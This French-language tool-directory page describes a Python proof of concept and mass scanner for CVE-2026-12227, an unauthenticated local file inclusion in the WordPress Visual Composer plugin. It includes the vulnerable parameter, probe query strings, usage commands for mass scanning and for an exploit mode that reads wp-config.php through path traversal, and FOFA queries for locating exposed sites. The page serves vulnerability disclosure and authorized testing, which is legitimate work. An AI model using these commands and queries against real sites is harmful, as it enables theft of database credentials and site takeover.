Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-12227 — PoC et scanner en Python 3 pour CVE-2026-12227, une inclusion de fichier local non authentifiée dans WordPress Visual Composer Website Builder via le paramètre vcv-template. | Kitploit
Outils/GitHubGitHub/murrez/cve-2026-12227
ReconnaissanceScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubmurrez/cve-2026-12227

CVE-2026-12227

PoC et scanner en Python 3 pour CVE-2026-12227, une inclusion de fichier local non authentifiée dans WordPress Visual Composer Website Builder via le paramètre vcv-template.

1il y a 10h 12mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
Partager

CVE-2026-12227 — Inclusion de fichier local non authentifiée dans Visual Composer Website Builder

PoC Python 3 pour CVE-2026-12227 (Wordfence) : Inclusion de fichier local via le paramètre de requête vcv-template dans Visual Composer Website Builder (visualcomposer sur wordpress.org).

PlateformeExtension WordPress
ComposantVisual Composer Website Builder
Affecté≤ 45.16.0
Corrigé dans> 45.16.0 (WP Trac 3619572) — utilisez la dernière version stable (par ex. 45.16.3+)
CVSS9.8 Critique (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
AuthNon authentifié
CWECWE-98
PasWPBakery (js_composer) ni SAP NetWeaver Visual Composer

Résumé

Sur les versions vulnérables, les chargements de pages publiques honorent le paramètre vcv-template contrôlé par l'attaquant (avec vcv-template-type) lors du traitement de template_include de WordPress au sein de PageTemplatesController. Cela peut inclure des fichiers choisis par l'attaquant sur le disque ; les fichiers PHP peuvent s'exécuter (RCE). Wordfence note des chaînes avec des extensions « sûres » téléversées dans certaines configurations.

Surface d'attaque

  • Nécessite l'extension installée et une page front-end construite avec VC (permalien normal).
  • La sonde ajoute des paramètres de requête, par ex. ?vcv-template-type=vc&vcv-template=blank ou des chemins LFI sous vcv-template.
  • Paramètres associés : vcv-template-type, vcv-template-stretched.

Prérequis

root@kitploit:~
pip install -r requirements.txt

Python 3.8+.

Utilisation

root@kitploit:~
# Version + plugin + VC page crawl + template/LFI probes
python poc.py -u https://target.example --mode check

# Known VC landing page
python poc.py -u https://target.example --mode check --page-url /

# Mass scan
python poc.py --list targets.example.txt --mode check --threads 25 --quiet

# Custom include path (authorized testing only)
python poc.py -u https://target.example --mode exploit --page-url / --file ../../../../../../wp-config.php

# JSON for scripting
python poc.py -u https://target.example --mode check --json

Sortie

FichierSignification
cve_2026_12227_results.jsonlJSON complet par cible

Valeurs de statut

Indices FOFA

root@kitploit:~
body="/wp-content/plugins/visualcomposer/"
body="data-vcv-" && body="wp-content"

Notes techniques

  • Chemin du code : visualcomposer/Modules/Editors/Settings/PageTemplatesController.php (getCurrentTemplateLayout, viewPageTemplate).
  • Check traite le contrôle du paramètre ou les marqueurs LFI comme exploitable_candidate ; confirmez sur un clone de préproduction avant de supposer une RCE.
  • Les modules premium TemplateFilter / theme-builder peuvent élargir les chemins accessibles sur certains sites.

Légal

À utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test.

Télécharger l’outil
hits.txtNoms d'hôtes candidats
candidates.jsonlRésumé du mode check (page_url, status, lfi)
StatutSignification
lfi_confirmedLa réponse correspond aux heuristiques wp-config / /etc/passwd / version.php
vcv_template_controllablevcv-template=blank modifie la mise en page par rapport à la référence (paramètre vulnérable honoré)
plugin_vuln_no_surfaceAncienne version de l'extension mais aucune page VC ou paramètre ignoré
no_vc_pageExtension présente, aucun marqueur VC sur les chemins explorés
patchedVersion > 45.16.0